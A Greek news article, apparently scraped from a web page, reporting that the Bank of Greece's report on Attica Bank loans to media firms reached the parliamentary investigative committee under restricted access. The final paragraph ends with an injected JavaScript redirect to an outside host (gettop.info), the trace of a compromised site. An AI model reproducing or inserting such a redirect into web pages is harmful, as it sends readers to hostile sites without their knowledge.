Στην Εξεταστική το πόρισμα της ΤτΕ γα την ΤράπεζαΑττικής

0
2

 

Στην Εξεταστική Επιτροπή που διερευνά τα δάνεια σε κόμματα και Μέσα Ενημέρωσης έφτασε το πολυαναμενόμενο πόρισμα της Τράπεζας της Ελλάδας για τα δάνεια της Τράπεζας Αττική σε ΜΜΕ.

Το πολυσέλιδο πόρισμα, το οποίο κατά το μεγαλύτερο μέρος του είναι στα αγγλικά, εστάλη από την ΤτΕ ύστερα από σχετικό αίτημα του προέδρου της Επιτροπής Σωκράτη Φάμελλου. Η απόφαση ελήφθη κατά τη διάρκεια της τελευταίας συνεδρίασης της Εξεταστικής.

Σύμφωνα με τις πληροφορίες στο πόρισμα θα έχουν πρόσβαση μόνο τα μέλη της Επιτροπής χωρίς ωστόσο να μπορούν να πάρουν αντίγραφο, ενώ δεν θα δοθεί αντίγραφο στα κόμματα.

Σημειώνεται ότι από την Τράπεζα της Ελλάδας ανακοινώθηκε ότι «το πόρισμα για την Τράπεζα Αττικής παρεδόθη στον Σωκράτη Φάμελλο, πρόεδρο της Εξεταστικής Επιτροπής της Βουλής των Ελλήνων για τη διερεύνηση της νομιμότητας της δανειοδότησης των πολιτικών κομμάτων, καθώς και των ιδιοκτητριών εταιρειών μέσων μαζικής ενημέρωσης από τα τραπεζικά ιδρύματα της χώρας». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here